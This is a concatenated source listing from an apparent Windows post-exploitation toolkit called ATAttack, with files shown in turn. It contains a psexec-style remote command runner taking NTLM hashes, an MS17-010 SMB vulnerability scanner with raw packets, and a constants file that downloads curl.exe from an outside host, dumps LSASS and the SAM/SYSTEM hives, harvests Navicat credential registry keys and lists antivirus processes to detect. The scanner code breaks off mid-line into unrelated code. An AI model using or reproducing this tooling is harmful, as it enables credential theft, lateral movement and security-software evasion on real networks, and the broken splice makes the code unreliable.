    parser.add_argument('-path', action='store', help='path of the command to execute')
    parser.add_argument('-file', action='store', help="alternative RemCom binary (be sure it doesn't require CRT)")
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re

    # Split "[[domain/]username[:password]@]host"; missing groups become ''.
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if domain is None:
        domain = ''

    # Prompt only when no other credential source (hash, Kerberos, AES key) was given.
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        password = getpass("Password:")

    if options.aesKey is not None:
        options.k = True

    command = ' '.join(options.command)
    if command == ' ':
        command = 'cmd.exe'

    executer = PSEXEC(command, options.path, options.file, options.c, None, username, password, domain, options.hashes,
                      options.aesKey, options.k, options.dc_ip)
    executer.run(address)
473 |
--------------------------------------------------------------------------------
/ATAttack/credentials/yhzldb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import binascii
4 | import socket
5 | import struct
6 | import threading
7 |
8 | # more detail: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
9 | # Packets
# Pre-built SMB1 request packets (hex-decoded once at import) that check_ip()
# replays verbatim: protocol negotiation, session setup, tree connect and a
# named-pipe transaction. The bulletin linked above describes the weakness
# whose presence is inferred from the replies.
NEGOTIATE_PROTOCOL_REQUEST = binascii.unhexlify(
    "00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
SESSION_SETUP_REQUEST = binascii.unhexlify(
    "00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
TREE_CONNECT_REQUEST = binascii.unhexlify(
    "00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
NAMED_PIPE_TRANS_REQUEST = binascii.unhexlify(
    "0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")

timeout = 1      # socket timeout in seconds; a falsy value disables it (see check_ip)
threads = 20
verbose = ''     # falsy: check_ip() prints no status messages
threads_num = int(threads)
semaphore = threading.BoundedSemaphore(value=threads_num)
print_lock = threading.Lock()   # serialises console output across threads
25 |
26 |
def print_status(ip, message):
    """Print "[*] [ip] message" while holding the module-level print lock,
    so lines from concurrent check_ip() threads do not interleave."""
    global print_lock

    with print_lock:
        print "[*] [%s] %s" % (ip, message)
32 |
33 | def check_ip(ip):
34 | global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
35 |
36 | # Connect to socket
37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | s.settimeout(float(timeout) if timeout else None)
39 | host = ip
40 | port = 445
41 | s.connect((host, port))
42 |
43 | # Send/receive negotiate protocol request
44 | if verbose:
45 | print_status(ip, "Sending negotiation protocol request")
46 | s.send(NEGOTIATE_PROTOCOL_REQUEST)
47 | negotiate_reply = s.recv(1024)
48 | if len(negotiate_reply) < 36 or struct.unpack(
49 | " 0:
124 | paddr = self.vtop(new_vaddr)
125 | if paddr == None and zero:
126 | stuff_read = stuff_read + "\0" * left_over
127 | elif paddr == None:
128 | return None
129 | else:
130 | stuff_read = stuff_read + self.base.read(paddr, left_over)
131 | return stuff_read
132 |
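    def read_long_phys(self, addr):
        """Read a 4-byte little-endian unsigned integer at physical address *addr*.

        The format is an explicit '<L': the native 'L' used previously is
        8 bytes wide on LP64 platforms (64-bit Linux/macOS), where
        struct.unpack rejects the 4-byte buffer returned by self.base.read().
        Raises struct.error when fewer than 4 bytes are returned.
        """
        string = self.base.read(addr, 4)
        (longval, ) = struct.unpack('<L', string)
        return longval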
137 |
    def is_valid_address(self, vaddr):
        """Return True when *vaddr* translates (vtop) to a physical address
        that the underlying space accepts; a None/0 translation is invalid."""
        physical = self.vtop(vaddr)
        return bool(physical) and self.base.is_valid_address(physical)
142 |
--------------------------------------------------------------------------------
/ATAttack/framework/constant.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import tempfile
4 | import random
5 | import string
6 | import time
7 | import os
8 | import getpass
9 |
10 |
# Temp directory and a per-run timestamp ("DDMMYYYY_HHMMSS.tmp") that name
# the output files created during this run.
tmp = tempfile.gettempdir()
date = "%s.tmp" % time.strftime("%d%m%Y_%H%M%S")
13 |
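class constant():
    """Import-time configuration shared by the ATAttack modules.

    Every setting is a plain class attribute read as ``constant.<name>``.
    The per-run paths are built from the module-level ``date`` stamp, so one
    process uses a single upload directory for its whole lifetime.
    """
    # Remote curl.exe pulled onto targets.  NOTE(review): nothing in this
    # file pins a hash or signature for it, so the download is trusted purely
    # on the strength of the file host and the TLS connection.
    # pyurl = "https://www.yunzhijia.com/microblog/filesvr/5e89bca6b54c8d14ea9061a7/nnn.exe"
    curl_url = 'https://www.yunzhijia.com/microblog/filesvr/5e89d52aa37259795a86e7e4/curl.exe'
    # pyexe = "wpsd.exe"
    # pyname = "mimi.json"
    # Per-run working directory under the system temp dir and the LSASS dump
    # written inside it.
    upload_dir = tempfile.gettempdir() + os.sep + date
    dump_name = upload_dir + os.sep + "lsass.dmp"
    # Host-enumeration commands executed on the target.
    cmdlist = [
        r'reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"',
        # Fix: was 'rout print', which is not a Windows command.
        'route print',
        'net session',
        'arp -a',
        r'type C:\windows\system32\drivers\etc\hosts',
        'ipconfig /all',
        'netstat -na',
        # Logon success/failure events (4624/4625).  If timediff() is the
        # usual millisecond delta, 4449183132 covers roughly the last 51 days.
        'wevtutil qe security /rd:true /f:text /q:"Event[System[(EventID=4624 or EventID=4625) and TimeCreated[timediff(@SystemTime) <= 4449183132]]]"']
    drive = 'C'
    user = getpass.getuser()
    # Random token in [100, 500) step 3, kept as a string.
    temp_ = str(random.randrange(100, 500, 3))
    tmp_name = upload_dir + os.sep + "update.log"
    tmp_name_ = upload_dir + os.sep + "drive.txt"
    tmp_name__ = upload_dir + os.sep + "host.txt"
    file_name_results = 'credentials_{current_time}'.format(
        current_time=date
    )  # The extension is added depending on the user output choice
    # Navicat connection stores per database flavour (HKCU-relative paths).
    regs = {
        'MySQL Server' : 'Software\\PremiumSoft\\Navicat\\Servers',
        'MariaDB Server' : 'Software\\PremiumSoft\\NavicatMARIADB\\Servers',
        'MongoDB Server' : 'Software\\PremiumSoft\\NavicatMONGODB\\Servers',
        'MSSQL Server' : 'Software\\PremiumSoft\\NavicatMSSQL\\Servers',
        'OracleSQL Server' : 'Software\\PremiumSoft\\NavicatOra\\Servers',
        'PostgreSQL Server' : 'Software\\PremiumSoft\\NavicatPG\\Servers',
        'SQLite Server' : 'Software\\PremiumSoft\\NavicatSQLite\\Servers'
    }
    # Windows profile locations.  NOTE(review): APPDATA / ALLUSERSPROFILE /
    # LOCALAPPDATA are expanded here while the other entries are still
    # '{drive}' / '{user}' templates -- presumably the consumer .format()s
    # them; confirm which form each caller expects.
    profile = {
        'APPDATA': drive + ":\\Users\\" + user + "\\AppData\\Roaming\\",
        'USERPROFILE': u'{drive}:\\Users\\{user}\\',
        'HOMEDRIVE': u'{drive}:',
        'HOMEPATH': u'{drive}:\\Users\\{user}',
        'ALLUSERSPROFILE': drive + ":\\ProgramData",
        'COMPOSER_HOME': u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Composer\\',
        'LOCALAPPDATA': drive + ":\\Users\\" + user + "\\AppData\\Local\\",
    }
    system_dpapi = None
    # Default account; the LM half of the hash template is the well-known
    # empty-password LM hash (see empty_lm in hashdump.py) and only the NT
    # half is filled in at runtime.
    username = "administrator"
    lmhash = "aad3b435b51404eeaad3b435b51404ee:{}"
    keepass = {}
    # Random temp-file names the SYSTEM and SAM hives are saved under.  The
    # names come from the non-cryptographic `random` module, so they are
    # guessable by another local user watching the shared temp directory.
    hives = {
        'system': os.path.join(
            tempfile.gettempdir(),
            ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
        'sam': os.path.join(
            tempfile.gettempdir(),
            ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
        # 'security': os.path.join(
        #     tmp,
        #     ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
    }
    # Process-name -> product table used to recognise security software in a
    # task list.  Values are the original Chinese display labels.  Keys are
    # kept exactly as written: a few differ only by case ("SafeDogGuardCenter"
    # vs "safedogguardcenter"), and "Iparmor.exe.exe" / "avgaurd.exe" look
    # like typos -- left untouched because the matching rules are not visible here.
    av_json = {
        "360tray.exe": "360安全卫士-实时保护",
        "360safe.exe": "360安全卫士-主程序",
        "ZhuDongFangYu.exe": "360安全卫士-主动防御",
        "360sd.exe": "360杀毒",
        "a2guard.exe": "a-squared杀毒",
        "ad-watch.exe": "Lavasoft杀毒",
        "cleaner8.exe": "The Cleaner杀毒",
        "vba32lder.exe": "vb32杀毒",
        "MongoosaGUI.exe": "Mongoosa杀毒",
        "CorantiControlCenter32.exe": "Coranti2012杀毒",
        "F-PROT.exe": "F-Prot AntiVirus",
        "CMCTrayIcon.exe": "CMC杀毒",
        "K7TSecurity.exe": "K7杀毒",
        "UnThreat.exe": "UnThreat杀毒",
        "CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒",
        "AVWatchService.exe": "VIRUSfighter杀毒",
        "ArcaTasksService.exe": "ArcaVir杀毒",
        "iptray.exe": "Immunet杀毒",
        "PSafeSysTray.exe": "PSafe杀毒",
        "nspupsvc.exe": "nProtect杀毒",
        "SpywareTerminatorShield.exe": "SpywareTerminator杀毒",
        "BKavService.exe": "Bkav杀毒",
        "MsMpEng.exe": "Microsoft Security Essentials",
        "SBAMSvc.exe": "VIPRE",
        "ccSvcHst.exe": "Norton杀毒",
        "f-secure.exe": "冰岛",
        "avp.exe": "Kaspersky",
        "KvMonXP.exe": "江民杀毒",
        "RavMonD.exe": "瑞星杀毒",
        "Mcshield.exe": "Mcafee",
        "Tbmon.exe": "Mcafee",
        "Frameworkservice.exe": "Mcafee",
        "egui.exe": "ESET NOD32",
        "ekrn.exe": "ESET NOD32",
        "eguiProxy.exe": "ESET NOD32",
        "kxetray.exe": "金山毒霸",
        "knsdtray.exe": "可牛杀毒",
        "TMBMSRV.exe": "趋势杀毒",
        "avcenter.exe": "Avira(小红伞)",
        "avguard.exe": "Avira(小红伞)",
        "avgnt.exe": "Avira(小红伞)",
        "sched.exe": "Avira(小红伞)",
        "ashDisp.exe": "Avast网络安全",
        "rtvscan.exe": "诺顿杀毒",
        "ccapp.exe": "Symantec Norton",
        "NPFMntor.exe": "Norton杀毒软件相关进程",
        "ccSetMgr.exe": "赛门铁克",
        "ccRegVfy.exe": "Norton杀毒软件自身完整性检查程序",
        "vptray.exe": "Norton病毒防火墙-盾牌图标程序",
        "ksafe.exe": "金山卫士",
        "QQPCRTP.exe": "QQ电脑管家",
        "Miner.exe": "流量矿石",
        "AYAgent.exe": "韩国胶囊",
        "patray.exe": "安博士",
        "V3Svc.exe": "安博士V3",
        "avgwdsvc.exe": "AVG杀毒",
        "QUHLPSVC.exe": "QUICK HEAL杀毒",
        "mssecess.exe": "微软杀毒",
        "SavProgress.exe": "Sophos杀毒",
        "fsavgui.exe": "F-Secure杀毒",
        "vsserv.exe": "比特梵德",
        "remupd.exe": "熊猫卫士",
        "FortiTray.exe": "飞塔",
        "safedog.exe": "安全狗",
        "parmor.exe": "木马克星",
        "Iparmor.exe.exe": "木马克星",
        "beikesan.exe": "贝壳云安全",
        "KSWebShield.exe": "金山网盾",
        "TrojanHunter.exe": "木马猎手",
        "GG.exe": "巨盾网游安全盾",
        "adam.exe": "绿鹰安全精灵",
        "AST.exe": "超级巡警",
        "ananwidget.exe": "墨者安全专家",
        "AVK.exe": "GData",
        "avg.exe": "AVG Anti-Virus",
        "spidernt.exe": "Dr.web",
        "avgaurd.exe": "Avira Antivir",
        "vsmon.exe": "ZoneAlarm",
        "cpf.exe": "Comodo",
        "outpost.exe": "Outpost Firewall",
        "rfwmain.exe": "瑞星防火墙",
        "kpfwtray.exe": "金山网镖",
        "FYFireWall.exe": "风云防火墙",
        "MPMon.exe": "微点主动防御",
        "pfw.exe": "天网防火墙",
        "S.exe": "在抓鸡",
        "1433.exe": "在扫1433",
        "DUB.exe": "在爆破",
        "ServUDaemon.exe": "发现S-U",
        "BaiduSdSvc.exe": "百度杀毒-服务进程",
        "BaiduSdTray.exe": "百度杀毒-托盘进程",
        "BaiduSd.exe": "百度杀毒-主程序",
        "SafeDogGuardCenter.exe": "安全狗",
        "safedogupdatecenter.exe": "安全狗",
        "safedogguardcenter.exe": "安全狗",
        "SafeDogSiteIIS.exe": "安全狗",
        "SafeDogTray.exe": "安全狗",
        "SafeDogServerUI.exe": "安全狗",
        "D_Safe_Manage.exe": "D盾",
        "d_manage.exe": "D盾",
        "yunsuo_agent_service.exe": "云锁",
        "yunsuo_agent_daemon.exe": "云锁",
        "HwsPanel.exe": "护卫神",
        "hws_ui.exe": "护卫神",
        "hws.exe": "护卫神",
        "hwsd.exe": "护卫神",
        "hipstray.exe": "火绒",
        "wsctrl.exe": "火绒",
        "usysdiag.exe": "火绒",
        "WEBSCANX.EXE": "网络病毒克星",
        "SPHINX.EXE": "SPHINX防火墙",
        "bddownloader.exe": "百度卫士",
        "baiduansvx.exe": "百度卫士-主进程",
        "AvastUI.exe": "Avast!5主程序",
    }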
189 |
190 |
191 |
--------------------------------------------------------------------------------
/ATAttack/framework/newobj.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see <http://www.gnu.org/licenses/>.
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from ATAttack.framework.object import *
23 | from ATAttack.framework.types import regtypes as types
24 | from operator import itemgetter
25 | from struct import unpack
26 |
def get_ptr_type(structure, member):
    """Return the type a pointer points to.

    Arguments:
        structure : the name of the structure from vtypes
        member : a list of members

    Walks ``member`` one step at a time through the vtype table; an array
    member answers with its element's pointee, any other member recurses
    into the member's own type.

    Example:
        get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
    """
    if len(member) <= 1:
        # Leaf: the pointee is recorded next to the member's type name.
        return types[structure][1][member[0]][1][1]

    _, member_type = get_obj_offset(types, [structure, member[0]])
    if member_type == 'array':
        return types[structure][1][member[0]][1][2][1]
    return get_ptr_type(member_type, member[1:])
45 |
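class Obj(object):
    """Base class for all objects.

    An Obj is a typed window onto ``space`` at ``address``; ``name`` is the
    key into the vtype table ``types``.  Reading an attribute that is a
    vtype member yields another Obj / Pointer / Primitive positioned at the
    member's offset, so structures can be walked with dotted access.

    May return a subclass for certain data types to allow
    for special handling.
    """

    def __new__(typ, name, address, space):
        # Dispatch on the vtype name: a class of the same name in this
        # module wins, builtin scalars become Primitive, anything else is
        # a plain Obj.
        if name in globals():
            # This is a bit of "magic"
            # Could be replaced with a dict mapping type names to types
            return globals()[name](name,address,space)
        elif name in builtin_types:
            return Primitive(name, address, space)
        else:
            obj = object.__new__(typ)
            return obj

    def __init__(self, name, address, space):
        self.name = name            # vtype name
        self.address = address      # address of this object within space
        self.space = space          # address space offering read()/is_valid_address()

        # Subclasses can add fields to this list if they want them
        # to show up in values() or members(), even if they do not
        # appear in the vtype definition
        self.extra_members = []

    def __getattribute__(self, attr):
        """Real attributes first; otherwise resolve ``attr`` as a vtype member."""
        try:
            return object.__getattribute__(self, attr)
        except AttributeError:
            pass

        if self.name in builtin_types:
            raise AttributeError("Primitive types have no dynamic attributes")

        try:
            off, tp = get_obj_offset(types, [self.name, attr])
        except Exception:
            # Fix: was a bare except, which also swallowed KeyboardInterrupt/SystemExit.
            raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))

        if tp == 'array':
            a_len = types[self.name][1][attr][1][1]
            l = []
            for i in range(a_len):
                a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
                if a_tp == 'pointer':
                    ptp = get_ptr_type(self.name, [attr, i])
                    l.append(Pointer(a_tp, self.address+a_off, self.space, ptp))
                else:
                    l.append(Obj(a_tp, self.address+a_off, self.space))
            return l
        elif tp == 'pointer':
            # Can't just return a Obj here, since pointers need to also
            # know what type they point to.
            ptp = get_ptr_type(self.name, [attr])
            return Pointer(tp, self.address+off, self.space, ptp)
        else:
            return Obj(tp, self.address+off, self.space)

    def __div__(self, other):
        """Cast operator: ``obj / 'Type'`` or ``obj / ('pointer', [Target])``
        re-views the same address as another type."""
        if isinstance(other,tuple) or isinstance(other,list):
            return Pointer(other[0], self.address, self.space, other[1])
        elif isinstance(other,str):
            return Obj(other, self.address, self.space)
        else:
            raise ValueError("Must provide a type name as string for casting")

    # Python 3 routes '/' through __truediv__; keep the cast operator there too.
    __truediv__ = __div__

    def members(self):
        """Return a list of this object's members, sorted by offset."""

        # Could also just return the list
        membs = [ (k, v[0]) for k,v in types[self.name][1].items()]
        membs.sort(key=itemgetter(1))
        # Fix: list(...) so the concatenation also works where map() is lazy.
        return list(map(itemgetter(0),membs)) + self.extra_members

    def values(self):
        """Return a dictionary of this object's members and their values"""

        valdict = {}
        for k in self.members():
            valdict[k] = getattr(self, k)
        return valdict

    def bytes(self, length=-1):
        """Get bytes starting at the address of this object.

        Arguments:
            length : the number of bytes to read. Default: size of
                     this object.
        """

        if length == -1:
            length = self.size()
        return self.space.read(self.address, length)

    def size(self):
        """Get the size of this object (builtin scalar or vtype size)."""

        if self.name in builtin_types:
            return builtin_types[self.name][0]
        else:
            return types[self.name][0]

    def __repr__(self):
        return "<%s @%08x>" % (self.name, self.address)

    def __eq__(self, other):
        """Equal iff same address and same type name.

        Comparing against a non-Obj raises TypeError; left unchanged for
        compatibility with existing callers.
        """
        if not isinstance(other, Obj):
            raise TypeError("Types are incomparable")
        return self.address == other.address and self.name == other.name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Consistent with __eq__: both depend only on (address, name).
        return hash(self.address) ^ hash(self.name)

    def is_valid(self):
        """Whether the address space can actually back this object's address."""
        return self.space.is_valid_address(self.address)

    def get_offset(self, member):
        """(offset, type) of the member path ``member`` relative to this object."""
        return get_obj_offset(types, [self.name] + member)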
170 |
class Primitive(Obj):
    """Class to represent a primitive data type.

    Attributes:
        value : the python primitive value of this type, or None when the
                address space could not supply the bytes
    """

    def __new__(typ, *args, **kwargs):
        # Plain allocation: no type-name dispatch for scalars.
        return object.__new__(typ)

    def __init__(self, name, address, space):
        super(Primitive, self).__init__(name, address, space)
        size, fmt = builtin_types[name]
        raw = space.read(address, size)
        self.value = unpack(fmt, raw)[0] if raw else None

    def __repr__(self):
        return repr(self.value)

    def members(self):
        # Scalars have no members.
        return []
194 |
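class Pointer(Obj):
    """Class to represent pointers.

    value : the object pointed to

    If an attribute is not found in this instance,
    the attribute will be looked up in the referenced
    object.

    NOTE(review): read_value() returns None when the pointer bytes cannot
    be read; ``value`` is then an Obj at address None and any later use of
    it (repr, member reads) will fail -- callers should check is_valid().
    """

    def __new__(typ, *args, **kwargs):
        obj = object.__new__(typ)
        return obj

    def __init__(self, name, address, space, ptr_type):
        super(Pointer,self).__init__(name, address, space)
        # Dereference once: the pointee's address is the scalar at `address`.
        ptr_address = read_value(space, name, address)
        if ptr_type[0] == 'pointer':
            self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
        else:
            self.value = Obj(ptr_type[0], ptr_address, self.space)

    def __getattribute__(self, attr):
        # It's still nice to be able to access things through pointers
        # without having to explicitly dereference them, so if we don't
        # find an attribute via our superclass, just dereference the pointer
        # and return the attribute in the pointed-to type.
        try:
            return super(Pointer,self).__getattribute__(attr)
        except AttributeError:
            # Fix: fetch `value` without re-entering this method; if __init__
            # never set it, this raises AttributeError instead of recursing
            # until RecursionError.
            target = object.__getattribute__(self, 'value')
            return getattr(target, attr)

    def __repr__(self):
        # Fix: the format string had no placeholders for its two arguments
        # and raised TypeError.  The exact original literal was lost in the
        # listing; this form mirrors Obj.__repr__ and names the pointee.
        return "<%s pointer @%08x>" % (self.value.name, self.value.address)

    def members(self):
        return self.value.members()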
231 |
class _UNICODE_STRING(Obj):
    """Class representing a _UNICODE_STRING

    Adds the following behavior:
    * The Buffer attribute is presented as a Python string rather
      than a pointer to an unsigned short.
    * The __str__ method returns the value of the Buffer.

    NOTE(review): read_unicode_string() returns None on a failed read or
    decode, in which case str() raises TypeError.  It also needs a
    '_UNICODE_STRING' entry in the vtype table; the regtypes table shipped
    in this package does not define one.
    """

    def __new__(typ, *args, **kwargs):
        return object.__new__(typ)

    # Custom Attributes
    def getBuffer(self):
        return read_unicode_string(self.space, types, [], self.address)

    Buffer = property(getBuffer)

    def __str__(self):
        return self.Buffer
252 |
class _CM_KEY_NODE(Obj):
    """Registry key node; exposes the raw key name bytes as ``Name``.

    NameLength is taken from the hive itself, so a crafted hive controls
    how many bytes are read.
    """

    def __new__(typ, *args, **kwargs):
        return object.__new__(typ)

    def getName(self):
        name_len = self.NameLength.value
        return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
                           self.address, name_len)

    Name = property(getName)
262 |
class _CM_KEY_VALUE(Obj):
    """Registry value cell; exposes the raw value name bytes as ``Name``.

    NameLength is taken from the hive itself, so a crafted hive controls
    how many bytes are read.
    """

    def __new__(typ, *args, **kwargs):
        return object.__new__(typ)

    def getName(self):
        name_len = self.NameLength.value
        return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
                           self.address, name_len)

    Name = property(getName)
272 |
class _CHILD_LIST(Obj):
    """Value list of a key node: ``List`` yields one pointer per value cell.

    NOTE(review): Count is read from the hive, so a crafted hive can make
    this list (and the loop building it) arbitrarily large.
    """

    def __new__(typ, *args, **kwargs):
        return object.__new__(typ)

    def getList(self):
        # Address of the array of 4-byte cell offsets.
        base = read_obj(self.space, types, ['_CHILD_LIST', 'List'], self.address)
        return [Pointer("pointer", base + (i * 4), self.space, ["_CM_KEY_VALUE"])
                for i in range(self.Count.value)]

    List = property(getList)
287 |
class _CM_KEY_INDEX(Obj):
    """Sub-key index: ``List`` yields one pointer per child key node.

    Each entry occupies two slots of the underlying array (offset, hash);
    only the even slots are dereferenced.  NOTE(review): Count is read from
    the hive, so a crafted hive controls the list size.
    """

    def __new__(typ, *args, **kwargs):
        return object.__new__(typ)

    def getList(self):
        # we are ignoring the hash value here
        slot_offsets = [get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i * 2])[0]
                        for i in range(self.Count.value)]
        return [Pointer("pointer", self.address + off, self.space, ["_CM_KEY_NODE"])
                for off in slot_offsets]

    List = property(getList)
302 |
--------------------------------------------------------------------------------
/ATAttack/framework/object.py:
--------------------------------------------------------------------------------
1 | # Volatools Basic
2 | # Copyright (C) 2007 Komoku, Inc.
3 | #
4 | # This program is free software; you can redistribute it and/or modify
5 | # it under the terms of the GNU General Public License as published by
6 | # the Free Software Foundation; either version 2 of the License, or (at
7 | # your option) any later version.
8 | #
9 | # This program is distributed in the hope that it will be useful, but
10 | # WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
12 | # General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License
15 | # along with this program; if not, write to the Free Software
16 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 | #
18 |
19 | """
20 | @author: AAron Walters and Nick Petroni
21 | @license: GNU General Public License 2.0 or later
22 | @contact: awalters@komoku.com, npetroni@komoku.com
23 | @organization: Komoku, Inc.
24 | """
25 |
26 | import struct
27 |
# Scalar vtypes: name -> (byte size, struct format).  Sizes follow the
# 32-bit Windows model (4-byte long / pointer); formats are native byte
# order and so assume a little-endian host.
builtin_types = {
    'int':                (4, 'i'),
    'long':               (4, 'i'),
    'unsigned long':      (4, 'I'),
    'unsigned int':       (4, 'I'),
    'address':            (4, 'I'),
    'char':               (1, 'c'),
    'unsigned char':      (1, 'B'),
    'unsigned short':     (2, 'H'),
    'short':              (2, 'h'),
    'long long':          (8, 'q'),
    'unsigned long long': (8, 'Q'),
    'pointer':            (4, 'I'),
}
42 |
43 |
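def obj_size(types, objname):
    """Return the byte size recorded for vtype ``objname`` in ``types``.

    Raises Exception when the name is unknown.
    """
    # Fix: dict.has_key() does not exist on Python 3; `in` works on both.
    if objname not in types:
        raise Exception('Invalid type %s not in types' % (objname))

    return types[objname][0]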
49 |
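def builtin_size(builtin):
    """Return the byte size of the builtin scalar type ``builtin``.

    Raises Exception when the name is not in builtin_types.
    """
    # Fix: dict.has_key() does not exist on Python 3; `in` works on both.
    if builtin not in builtin_types:
        raise Exception('Invalid built-in type %s' % (builtin))

    return builtin_types[builtin][0]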
55 |
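def read_value(addr_space, value_type, vaddr):
    """
    Read the low-level value for a built-in type.

    Returns None when the address space cannot supply the bytes (a None or
    short read); raises Exception for an unknown ``value_type``.
    """

    # Fix: dict.has_key() does not exist on Python 3; `in` works on both.
    if value_type not in builtin_types:
        raise Exception('Invalid built-in type %s' % (value_type))

    type_size, type_unpack_char = builtin_types[value_type]

    buf = addr_space.read(vaddr, type_size)
    # Fix: a short read (e.g. at the end of the hive file) used to surface
    # as struct.error; report it like a failed read instead.
    if buf is None or len(buf) < type_size:
        return None
    (val, ) = struct.unpack(type_unpack_char, buf)

    return val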
73 |
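def read_unicode_string(addr_space, types, member_list, vaddr):
    """Read the _UNICODE_STRING at ``vaddr`` (plus member offset) as ASCII.

    Returns "" for a zero Length, and None when Buffer/Length cannot be
    read, the pointed-to bytes cannot be read, or the text does not decode
    as UTF-16 / encode as ASCII.  Requires a '_UNICODE_STRING' entry in
    ``types``; the regtypes table in this package does not provide one.
    """
    offset = 0
    if len(member_list) > 1:
        (offset, _current_type) = get_obj_offset(types, member_list)


    buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
    length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)

    if length == 0x0:
        return ""

    if buf is None or length is None:
        return None

    # Length is passed straight through as the byte count to read.
    readBuf = read_string(addr_space, types, ['char'], buf, length)

    if readBuf is None:
        return None

    try:
        # NOTE(review): 'UTF-16' without a BOM decodes in host byte order;
        # hashdump.py uses 'utf-16-le' explicitly for registry text.
        readBuf = readBuf.decode('UTF-16').encode('ascii')
    except UnicodeError:
        # Fix: was a bare except, which also hid KeyboardInterrupt.
        return None

    return readBuf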
100 |
def read_string(addr_space, types, member_list, vaddr, max_length=256):
    """Read ``max_length`` raw bytes at ``vaddr``.

    When ``member_list`` names a type and a member path, the member's offset
    is added to ``vaddr`` first.  Returns whatever the address space returns
    (possibly None or fewer bytes); no NUL handling here.
    """
    start = vaddr
    if len(member_list) > 1:
        member_offset, _ = get_obj_offset(types, member_list)
        start += member_offset

    return addr_space.read(start, max_length)
109 |
110 |
def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
    """Like read_string, but cut at the first NUL byte.

    Returns None when the underlying read fails; the whole buffer when it
    holds no NUL at all.
    """
    raw = read_string(addr_space, types, member_list, vaddr, max_length)

    if raw is None:
        return None

    # With no NUL present split() returns the whole string as its only part.
    return raw.split('\0', 1)[0]
121 |
122 |
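def get_obj_offset(types, member_list):
    """
    Returns the (offset, type) pair for a given list

    ``member_list`` is ``[type_name, member, member_or_index, ...]``;
    ``types`` maps type names to ``[size, {member: [offset, [type, ...]]}]``.
    An array member is followed by an integer index, scaled by the element
    size.  Raises Exception on an unknown type or member.
    """
    # Fix: the original reversed and popped the caller's list in place,
    # leaving it empty afterwards; work on a private copy instead.
    path = list(member_list)
    path.reverse()

    current_type = path.pop()

    offset = 0
    member_dict = None
    current_member = None

    while (len(path) > 0):
        if current_type == 'array':
            # Element type of the array member located in the previous step.
            current_type = member_dict[current_member][1][2][0]
            if current_type in builtin_types:
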